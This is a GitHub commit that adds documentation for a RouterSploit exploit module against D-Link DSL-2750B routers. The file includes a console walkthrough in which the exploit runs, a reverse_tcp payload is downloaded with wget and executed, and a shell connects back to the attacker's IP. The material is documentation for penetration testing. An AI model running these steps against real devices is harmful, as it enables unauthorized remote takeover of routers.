Adding documentation for D-Link DSL2750B RCE module (#442)

d64359b8 · Marcin Bury · GitHub · dfb9e417 · d64359b8
Unverified Commit d64359b8 authored May 28, 2018 by Marcin Bury Committed by GitHub May 28, 2018
Hide whitespace changes
Inline Side-by-side

Showing with 78 additions and 0 deletions

dsl_2750b_rce.md docs/modules/exploits/routers/dlink/dsl_2750b_rce.md +78 -0

No files found.
--- a/docs/modules/exploits/routers/dlink/dsl_2750b_rce.md
+++ b/docs/modules/exploits/routers/dlink/dsl_2750b_rce.md
+## Description
+This module exploits remote code execution vulnerability in D-Link DSL-2750B devices through "cli" parameter.
+Vulnerable firmwares are 1.01 up to 1.03.
+## Verification Steps
+    1. Start `./rsf.py`
+    2. Do: `use exploits/routers/dlink/dsl_2750b_rce`
+    3. Do: `set target [RouterIP]`
+    4. Do: `run`
+    5. If router is vulnerable, it should be possible to execute commands on operating system level.
+    6. Do: `set payload reverse_tcp`
+    7. Do: `set lhost [AttackerIP]`
+    8. Do: `run`
+    9. Payload is sent to device and executed providing attacker with the command shell.
+## Scenarios
+```
+rsf > use exploits/routers/dlink/dsl_2750b_rce
+rsf (D-Link DSL-2750B RCE) > set target 192.168.1.1
+[+] target => 192.168.1.1
+rsf (D-Link DSL-2750B RCE) > run
+[*] Running module...
+[+] Target appears to be vulnerable
+[+] Welcome to cmd. Commands are sent to the target via the execute method.
+[*] For further exploitation use 'show payloads' and 'set payload <payload>' commands.
+cmd > show payloads
+[*] Available payloads:
+   Payload         Name                   Description
+   -------         ----                   -----------
+   bind_tcp        MIPSBE Bind TCP        Creates interactive tcp bind shell for MIPSBE architecture.
+   reverse_tcp     MIPSBE Reverse TCP     Creates interactive tcp reverse shell for MIPSBE architecture.
+cmd > set payload reverse_tcp
+cmd (MIPSBE Reverse TCP) > show options
+Payload Options:
+   Name      Current settings     Description
+   ----      ----------------     -----------
+   lhost                          Connect-back IP address
+   lport     5555                 Connect-back TCP Port
+cmd (MIPSBE Reverse TCP) > set lhost 192.168.1.4
+lhost => 192.168.1.4
+cmd (MIPSBE Reverse TCP) > run
+[*] Using wget method
+[*] Using wget to download binary
+[*] Executing payload on the device
+[*] Waiting for reverse shell...
+[*] Connection from 192.168.1.1:41933
+[+] Enjoy your shell
+ls -la
+drwxrwxrwx   15 admin    root           224 Mar 11  2013 .
+drwxrwxrwx   15 admin    root           224 Mar 11  2013 ..
+drwxr-xr-x    2 admin    root          2554 Mar 11  2013 bin
+drwxr-xr-x    2 admin    root             3 Mar 11  2013 data
+drwxr-xr-x    4 admin    root          2482 Mar 11  2013 dev
+drwxr-xr-x   12 admin    root           779 Mar 11  2013 etc
+drwxr-xr-x    6 admin    root           690 Mar 11  2013 lib
+lrwxrwxrwx    1 admin    root            11 Mar 11  2013 linuxrc -> bin/busybox
+drwxr-xr-x    2 admin    root             0 Jan  1  1970 mnt
+drwxr-xr-x    5 admin    root            56 Mar 11  2013 opt
+dr-xr-xr-x   69 admin    root             0 Jan  1  1970 proc
+drwxr-xr-x    2 admin    root           270 Mar 11  2013 sbin
+drwxr-xr-x   11 admin    root             0 Jan  1  1970 sys
+lrwxrwxrwx    1 admin    root             8 Mar 11  2013 tmp -> /var/tmp
+drwxr-xr-x    4 admin    root            38 Mar 11  2013 usr
+drwxr-xr-x   16 admin    root             0 Oct 19 20:36 var
+drwxr-xr-x    5 admin    root          2801 Mar 11  2013 webs
+```